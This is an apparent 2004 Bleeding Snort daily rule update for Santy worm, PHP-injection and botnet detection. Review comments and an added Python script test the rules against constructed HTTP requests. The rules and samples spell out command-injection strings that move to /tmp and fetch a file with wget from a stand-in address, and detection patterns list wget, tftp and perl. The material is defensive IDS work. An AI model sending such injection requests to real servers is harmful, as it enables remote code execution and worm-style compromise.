[Snort-sigs] Bleedingsnort.com Daily Update

bleeding at ...2727...
Sat Dec 25 18:01:01 EST 2004


[***] Results from Oinkmaster started Sat Dec 25 21:00:03 2004 [***]

[+++]          Added rules:          [+++]

     -> Added to bleeding-virus.rules (4):
        alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Virus Santy.C Outbound Attack --LOCAL INFECTION--"; uricontent:"/spy.gif?&cmd=cd /tmp\;wget"; nocase; reference:url,www.k-otik.com/exploits/20041225.SantyC.php; flow:to_server,established; sid:2001615; rev:3;)
        alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"BLEEDING-EDGE Virus Santy.B worm variants searching for targets"; content:"GET /search|3f|"; nocase; content: "q=inurl|3a|"; nocase; content:".php|3f|"; nocase; within:10; pcre:"/&start=\d+/i"; classtype: trojan-activity; flow:to_server,established; sid:2001618; rev:2;)
        alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Virus Santy.C Inbound Attack"; uricontent:"/spy.gif?&cmd=cd /tmp\;wget"; nocase; reference:url,www.k-otik.com/exploits/20041225.SantyC.php; flow:to_server,established; sid:2001614; rev:3;)
        alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"BLEEDING-EDGE Virus Santy.B worm variants searching for targets"; content:"GET /search|3f|q=inurl|3a2a|.php|3f2a|="; nocase; pcre:"/\d+&start=\d+/iR"; classtype: trojan-activity; flow:to_server,established; sid:2001617; rev:2;)
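Review bot: 2001617 and 2001618 match the search query with content: against the raw payload, so the |3a| and |3f| bytes only hit when the client sends the colon and question mark literally; a client that percent-encodes them (q=inurl%3A...) trips neither rule. If that traffic matters, add an encoded alternate or move the query match to uricontent:, which is applied to the normalised URI. Note also that within:10 on the .php|3f| match in 2001618 leaves room for at most five bytes between inurl: and .php?, so it covers the wildcard form inurl:*.php? but not a named script such as inurl:viewtopic.php?; fine if intended, but worth a comment in the rule file.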

     -> Added to bleeding.rules (3):
        alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "BLEEDING-EDGE Exploit Suspected PHP Injection Attack"; content: "GET /"; nocase; content: ".php|3f|"; nocase; within: 64; pcre: "/(name=http|cmd=.*(cd|perl|wget|id|uname|t?ftp))/i"; flow:to_server,established; classtype: trojan-activity; sid:2001621; rev:2;)
        alert tcp $HOME_NET any -> 213.219.122.11/32 $HTTP_PORTS (msg:"BLEEDING-EDGE Attack Response Zone-H.org defacement notification"; pcre: "/notify_(defacer|domain|hackmode|reason)=/i"; flow:established,to_server; classtype: trojan-activity; sid:2001616; rev:3;)
        alert tcp $HOME_NET any -> any 6667 (msg:"BLEEDING-EDGE Attack Response Likely Botnet Activity"; tag:session,50,packets; content: "PRIVMSG"; nocase; pcre:"/(cheguei gazelas|meh que tao|Status|Tempo|Total pacotes|Total bytes|M?dia de envio|portas? aberta)/i"; classtype: string-detect; flow:to_server,established; sid:2001620; rev:2;)
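Review bot: in 2001621 the pcre alternation cmd=.*(cd|perl|wget|id|uname|t?ftp) has no word boundaries and .* spans the rest of the line, so id and cd match inside ordinary parameter names (any cmd=...&id= query, for example); anchor the keywords with \b or require them to follow cmd= directly, and expect noise until then. In 2001620, M?dia makes the M optional, so that alternative matches plain dia anywhere, including media; it looks like a non-ASCII character (probably the accented e of Média) was lost in transit and should be written as an explicit byte or as M.dia.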

[///]     Modified active rules:     [///]

     -> Modified active in bleeding-virus.rules (1):
        old: alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg: "BLEEDING-EDGE Virus Possible santy.A Worm Defaced Page"; content:"This site is defaced!!!"; nocase; content:"NeverEverNoSanity WebWorm generation X"; nocase; reference:url,securityresponse.symantec.com/avcenter/venc/data/perl.santy.html; sid:2001607; rev:1;)
        new: alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg: "BLEEDING-EDGE Virus Possible santy.A Worm Defaced Page"; content:"This site is defaced!!!"; nocase; content:"NeverEverNoSanity WebWorm generation X"; nocase; reference:url,securityresponse.symantec.com/avcenter/venc/data/perl.santy.html; flow:from_server,established; sid:2001607; rev:2;)
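Review bot: the change to 2001607 is the added flow:from_server,established with rev bumped 1 to 2, which is correct; while it is being touched, the rule still carries no classtype, unlike every rule added in this update, so add classtype: trojan-activity; and bump rev again so downstream tools see the change.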

[---]         Removed rules:         [---]

     -> Removed from bleeding-virus.rules (1):
        alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "BLEEDING-EDGE Virus Possible Santy.A Worm Searching Google for Targets"; uricontent:"&q=allinurl%3A+%22viewtopic.php%22+%22"; nocase; reference:url,securityresponse.symantec.com/avcenter/venc/data/perl.santy.html; sid:2001606; rev:1;)

[+++]      Added non-rule lines:     [+++]

     -> Added to bleeding-sid-msg.map (7):
        2001614 || BLEEDING-EDGE Virus Santy.C Inbound Attack || url,www.k-otik.com/exploits/20041225.SantyC.php
        2001615 || BLEEDING-EDGE Virus Santy.C Outbound Attack --LOCAL INFECTION-- || url,www.k-otik.com/exploits/20041225.SantyC.php
        2001616 || BLEEDING-EDGE Attack Response Zone-H.org defacement notification
        2001617 || BLEEDING-EDGE Virus Santy.B worm variants searching for targets
        2001618 || BLEEDING-EDGE Virus Santy.B worm variants searching for targets
        2001620 || BLEEDING-EDGE Attack Response Likely Botnet Activity
        2001621 || BLEEDING-EDGE Exploit Suspected PHP Injection Attack
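Review bot: 2001617 and 2001618 map to the identical message text, so anything keyed on the msg (alert digests, sid-msg lookups in a console) cannot tell the strict inurl|3a2a|.php|3f2a|= form from the looser within:10 form; add a short suffix to one of the msg strings and regenerate the map. 2001619, the yahoo variant listed under non-rule lines below, has no entry at all.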

     -> Added to bleeding-virus.rules (3):
        #By Erik Fichtner
        alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:BLEEDING-EDGE Virus Santy.B worm variants serarching for targets (yahoo)"; content:"GET /search|3f|"; nocase; content: "p=inurl|3a|"; nocase; content:".php|3f2a|="; nocase; within:10; pcre:"/\d+/iR"; content:"&ei=UTF-8&fl=0&all=1&pstart=1&b="; nocase; pcre:"/\d+/iR"; flow:to_server,established; classtype: trojan-activity; sid:2001619; rev:1;)
        #Matt Jonkman for .C
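Review bot: the 2001619 line landed under non-rule lines because its msg option lacks the opening double quote (msg:BLEEDING-EDGE Virus Santy.B worm variants serarching for targets (yahoo)"), so Oinkmaster did not recognise it as a rule, and Snort's option parser, which tracks quotes, will not load it cleanly either; it also misspells searching as serarching and is missing from bleeding-sid-msg.map. Restore the quote, fix the spelling and regenerate the map so the rule actually ships in the next update.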

     -> Added to bleeding.rules (2):
        #Erik Fichtner
        #By Erik Fichtner

[---]     Removed non-rule lines:    [---]

     -> Removed from bleeding-sid-msg.map (1):
        2001606 || BLEEDING-EDGE Virus Possible Santy.A Worm Searching Google for Targets || url,securityresponse.symantec.com/avcenter/venc/data/perl.santy.html

[*] Added files: [*]
    None.
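As an added example, not code from this update, from Bleeding Snort or from Snort itself, the following Python script models just enough of the content:/uricontent:, nocase, within and pcre (flag R) semantics to run four of the rules above (2001614, 2001617, 2001618 and 2001621) over constructed HTTP requests. The requests, the host names and the 203.0.113.5 address are made up for the demonstration, and the helper names (snort_bytes, match_rule, fired) are the example's own, not a Snort API; the option strings themselves are copied from the rules.

```python
import re
from urllib.parse import unquote

# Added example, not Bleeding Snort or Snort code: a minimal model of the
# content / uricontent / nocase / within / pcre (flag R) semantics used by the
# Santy and PHP-injection rules in this update. Helper names are the example's
# own; the option strings are copied from the rules above.


def snort_bytes(pattern: str) -> bytes:
    """Expand Snort content syntax: |3f 2a| hex blocks and \\; \\" escapes."""
    out, i = bytearray(), 0
    while i < len(pattern):
        if pattern[i] == '|':                       # |hex| block
            j = pattern.index('|', i + 1)
            out += bytes.fromhex(pattern[i + 1:j])
            i = j + 1
        elif pattern[i] == '\\':                    # escaped ; " or \
            out.append(ord(pattern[i + 1]))
            i += 2
        else:
            out.append(ord(pattern[i]))
            i += 1
    return bytes(out)


def content(pattern, nocase=False, within=None, uri=False):
    """content: (or uricontent: when uri=True) with optional nocase/within."""
    return ('content', uri, snort_bytes(pattern), nocase, within)


def pcre(snort_re):
    """'/regex/flags' -> (compiled bytes regex, R flag = relative to last match)."""
    body, flags = snort_re[1:].rsplit('/', 1)
    return ('pcre', re.compile(body.encode(), re.I if 'i' in flags else 0), 'R' in flags)


def request_uri(payload: bytes) -> bytes:
    """Percent-decoded request URI, standing in for Snort's normalised URI buffer."""
    parts = payload.split(b'\r\n', 1)[0].split(b' ')
    return unquote(parts[1].decode('latin-1')).encode('latin-1') if len(parts) > 1 else b''


def match_rule(steps, payload: bytes) -> bool:
    """Evaluate the payload options in order; single-buffer rules only."""
    cursor = 0   # end of the previous match: 'within' and pcre /R are relative to it
    for step in steps:
        if step[0] == 'content':
            _, uri, needle, nocase, within = step
            hay = request_uri(payload) if uri else payload
            if nocase:
                hay, needle = hay.lower(), needle.lower()
            # with 'within' the whole pattern must sit inside the N bytes after the
            # previous match; without it the search restarts from the payload start
            idx = hay.find(needle, cursor, cursor + within) if within is not None else hay.find(needle)
            if idx < 0:
                return False
            cursor = idx + len(needle)
        else:
            _, regex, relative = step
            m = regex.search(payload, cursor if relative else 0)
            if not m:
                return False
            cursor = m.end()
    return True


RULES = {
    2001614: [content("/spy.gif?&cmd=cd /tmp\\;wget", nocase=True, uri=True)],
    2001617: [content("GET /search|3f|q=inurl|3a2a|.php|3f2a|=", nocase=True),
              pcre(r"/\d+&start=\d+/iR")],
    2001618: [content("GET /search|3f|", nocase=True),
              content("q=inurl|3a|", nocase=True),
              content(".php|3f|", nocase=True, within=10),
              pcre(r"/&start=\d+/i")],
    2001621: [content("GET /", nocase=True),
              content(".php|3f|", nocase=True, within=64),
              pcre(r"/(name=http|cmd=.*(cd|perl|wget|id|uname|t?ftp))/i")],
}

# Constructed requests, not captured traffic; 203.0.113.5 is a documentation address.
SAMPLES = {
    "santy_c":         b"GET /spy.gif?&cmd=cd%20/tmp;wget%20http://203.0.113.5/x HTTP/1.0\r\nHost: forum.example\r\n\r\n",
    "santy_b":         b"GET /search?q=inurl:*.php?*=42&start=10 HTTP/1.0\r\nHost: www.google.com\r\n\r\n",
    "santy_b_encoded": b"GET /search?q=inurl%3A*.php%3F*%3D42&start=10 HTTP/1.0\r\nHost: www.google.com\r\n\r\n",
    "benign_search":   b"GET /search?q=snort+rules&start=10 HTTP/1.0\r\nHost: www.google.com\r\n\r\n",
    "php_inject":      b"GET /vuln.php?cmd=cd%20/tmp;wget%20http://203.0.113.5/bd HTTP/1.0\r\nHost: forum.example\r\n\r\n",
    "php_benign":      b"GET /video.php?cmd=list&id=7 HTTP/1.0\r\nHost: forum.example\r\n\r\n",
}


def fired(payload: bytes) -> set:
    """Sids whose payload options all match the request."""
    return {sid for sid, steps in RULES.items() if match_rule(steps, payload)}


if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(f"{name:16} -> {sorted(fired(req)) or 'no alert'}")
```

Running it shows three things the rule text alone does not: the %20-encoded Santy.C probe still trips 2001614 because uricontent: is applied to the decoded URI, while the percent-encoded search query in santy_b_encoded trips neither 2001617 nor 2001618 because content: sees the raw bytes; and the harmless video.php?cmd=list&id=7 request fires 2001621, since the unbounded id alternative in its pcre matches the &id= parameter.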
